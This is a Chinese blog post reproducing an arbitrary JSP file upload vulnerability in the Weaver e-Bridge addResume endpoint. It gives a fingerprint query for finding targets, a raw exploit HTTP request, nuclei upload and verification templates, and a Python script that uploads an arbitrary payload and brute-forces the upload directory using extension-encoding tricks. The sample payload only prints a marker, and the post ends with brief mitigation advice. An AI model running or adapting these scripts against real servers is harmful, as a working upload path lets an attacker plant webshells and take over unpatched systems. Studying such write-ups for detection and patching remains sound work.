泛微云桥(e-Bridge)addResume接口存在文件上传漏洞

已于 2024-08-28 16:54:34 修改
阅读量614 收藏 8
点赞数 10
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全 python
于 2024-08-28 16:48:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46604997/article/details/141643953
版权

0x00、声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。

中华人民共和国网络安全法

第二十七条 规定

任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。

0x01、产品概述

泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,企业可以通过e-Bridge快速实现基于微信及钉钉的移动办公应用接入。对于泛微协同办公产品e-cology更是实现了可视化的配置接入。后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。

0x02、漏洞描述:

泛微云桥(e-Bridge) /wxclient/app/recruit/resume/addResume接口处存在任意文件上传漏洞。

0x03、资产测绘

title="泛微云桥e-Bridge"

0x04、漏洞复现

4.1、数据包测试

1、POST请求包

POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
Host: 192.168.197.166:8088
Content-Length: 361
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="poc.jsp"
Content-Type: application/octet-stream

 <%
    out.println("poctest!");
%>
------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="poc.jsp"
Content-Type: application/octet-stream

 <%
    out.println("poctest!");
%>
------WebKitFormBoundaryD5Mawpg068t7pbxZ--

2、访问上传地址

http://192.168.197.166:8088/upload/202408/H/poc.js%70

注意:上传存放路径为  /upload/{年月}/{1/2位大写字母}/{上传的文件名}

例如:/upload/202408/H/poc.js%70

4.2、nuclei_POC测试

1、文件上传脚本

id: fanwei_upload

info:
  name: fanwei_upload
  author: kzzqwqwqwq
  severity: high
  description: fanwei_upload
  metadata:
    shodan-query: ""

requests:
- raw:
  - |-
    POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
    Host: {{Hostname}}
    Cache-Control: max-age=0
    sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Length: 422

    ------WebKitFormBoundaryD5Mawpg068t7pbxZ
    Content-Disposition: form-data; name="file"; filename="poc.jsp"
    Content-Type: application/octet-stream

     <%
        out.println("poctest!");
    %>
    ------WebKitFormBoundaryD5Mawpg068t7pbxZ
    Content-Disposition: form-data; name="file"; filename="poc.jsp"
    Content-Type: application/octet-stream

     <%
        out.println("poctest!");
    %>
    ------WebKitFormBoundaryD5Mawpg068t7pbxZ--

 2、验证脚本

id: fanwei_upload_verify

info:
  name: fanwei_upload_verify
  author: kzzqwqwqwq
  severity: high
  description: fanwei_upload
  metadata:
    shodan-query: ""

requests:
- raw:
  - |
    GET /upload/202408/{{wd}}/poc.js%70 HTTP/1.1
    Host: {{Hostname}}
  - |
    GET /upload/202408/{{wd}}/poc.%6a%73%70 HTTP/1.1
    Host: {{Hostname}}
  - |
    GET /upload/202408/{{wd}}/poc%2e%6a%73%70 HTTP/1.1
    Host: {{Hostname}}

  payloads:
    wd: zimu_1_2wd.txt

  #attack: clusterbomb

  #skip-variables-check: true
  stop-at-first-match: true
  max-redirects: 1
  matchers: 
    - type: dsl
      dsl:
       - contains(body,"poctest")  &&  status_code==200
      condition: and

 测试截图:

4.3、py脚本

import time
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
import datetime
import string
import sys
import requests

date = datetime.datetime.now().strftime("%Y%m")

# 生成所有可能的1或2位大写字母组合
let = [f"{a}" for a in string.ascii_uppercase] + [
    f"{a}{b}" for a in string.ascii_uppercase for b in string.ascii_uppercase
]

def verify(url0):
    url0 = f"{url0}/upload/{date}"
    poc = ["poc.js%70", "poc.%6a%73%70", "poc%2e%6a%73%70"]
    for pc in poc:
        for wd in let:
            url = f"{url0}/{wd}/{pc}"
            req = Request(url, method="GET")
            try:
                with urlopen(req) as response:
                    rep = response.read().decode()
                    if "poctest" in rep:
                        print(f"\nSuccess!!!  \nFound the vulnerability at: {url}")
                        return 1
            except HTTPError as e:
                pass  # print(f"HTTPError: {e.code} for URL: {url}")
            except URLError as e:
                pass  # print(f"URLError: {e.reason} for URL: {url}")
            except Exception as e:
                pass  # print(f"Exception: {e} for URL: {url}")
    return 0

def upload(url0, pay):
    url = f"{url0}/wxclient/app/recruit/resume/addResume?fileElementId=A"
    boundary = "----WebKitFormBoundaryD5Mawpg068t7pbxZ"
    headers = {
        "Cache-Control": "max-age=0",
        "sec-ch-ua": '(Not(A:Brand";v="8", "Chromium";v="99"',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": "Windows",
        "Upgrade-Insecure-Requests": "1",
        "Origin": "null",
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Sec-Fetch-Site": "cross-site",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
    }
    body = f"""------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="poc.jsp"
Content-Type: application/octet-stream

 {pay}
------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="poc.jsp"
Content-Type: application/octet-stream

 {pay}
------WebKitFormBoundaryD5Mawpg068t7pbxZ--"""
    try:
        requests.post(url, headers=headers, data=body, timeout=15)
    except requests.exceptions.RequestException as e1:
        pass
    # print(rep)


def poc(url):
    pay = "poctest!"
    upload(url, pay)
    time.sleep(2)
    if verify(url):
        return 1
    return 0


if __name__ == "__main__":
    url = "http://192.168.197.166:8088"
    pay = "poctest!"
    upload(url, pay)
    time.sleep(2)
    verify(url)

0x05、修复建议

临时缓解方案

1.白名单检查文件扩展名

2.上传文件的存储目录禁用执行权限

3.内容检测要求

4.隐藏上传文件路径

升级修复方案

官方已发布新版本修复漏洞,建议尽快访问官网或联系官方售后支持获取版本升级安装包或补丁。

m0_46604997
关注
专栏目录
泛微-云桥e-Bridge SQL注入漏洞复现
0xSec
12-12 1713
由于泛微-云桥e-Bridge平台/taste/addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库权限,获取用户密码等重要凭据,使系统处于极不安全状态。
泛微云桥e-Bridge addResume 任意文件上传漏洞分析
qq_18193739的博客
08-20 876
方法生成的随机两字母字符串附加到路径末尾,如:/upload/202408/AB。在isSafeFile 方法中,传入的文件名如果是jsp后缀的,就会执行。从wrapMultipartRequest 方法中,发现将文件流传入的。解压文件,得到一个“ROOT”文件夹,直接覆盖到自己泛微云桥目录即可。,只有1.jsp成功上传漏洞,222.jsp被删除了。这个部分代码处理了文件上传,将文件保存在指定目录中。从文件监控中,通过双文件上传,成功创建了两个文件。函数删除jsp文件,可通过双文件上传绕过。
1day速达软件NET接口存在RCE漏洞
weixin_43167326的博客
05-07 850
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
漏洞复现】泛微-云桥e-Bridge EC8.0 文件上传
今天是几号的博客
08-06 1648
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。泛微-云桥是一款基于云计算技术的企业级协作与办公平台,提供文档管理、流程审批、项目协作等功能,旨在提升企业内部沟通效率与工作协同能力。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
泛微云桥前台文件上传漏洞-202408
网络安全。
08-18 1134
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。
泛微云桥任意文件读取漏洞复现[09/18]
weixin_39811856的博客
09-18 1437
1.老规矩,搜寻目标机器(xpath用起来确实很方便) 2.根据网上的POC试试: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* 3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍: 发现这个好像有戏,没有/etc/passwd,并且还是
泛微云桥e-Bridge-addResume存在任意文件上传漏洞
weixin_43167326的博客
08-06 1344
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥resume接口存在任意文件上传漏洞,攻击者成功利用该漏洞,上传恶意木马控制服务器。
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
漏洞复现-泛微云桥 e-Bridge SQL注入(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1891
漏洞复现-泛微云桥 e-Bridge SQL注入,附带自己写的poc脚本
泛微云桥e-Bridge安装手册
04-10
泛微云桥e-Bridge】是上海泛微公司针对“互联网+”趋势推出的一款系统集成中间件,它旨在连接互联网开放资源与企业内部信息化系统。e-Bridge已实现对腾讯微信和阿里钉钉开放接口的封装,使企业能够迅速接入基于...
泛微e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7616
简介 泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="泛微云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8485
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 135
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 1206
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 838
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 350
Windows注册表
什么是“0day漏洞”?
分享关于Java编程、数据库管理和信息安全方面的最佳实践
09-29 612
0day漏洞是信息安全中的“幽灵”,因为它的隐蔽性和破坏性往往超出我们的预期。虽然普通用户和企业无法完全规避0day漏洞,但通过保持良好的安全习惯和使用合适的防护工具,可以在一定程度上降低受到0day攻击的风险。信息安全永远在变,防护措施也需要不断更新。在快速发展的网络环境中,我们只有时刻保持警惕,才能最大限度地保护我们的数据和隐私。
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值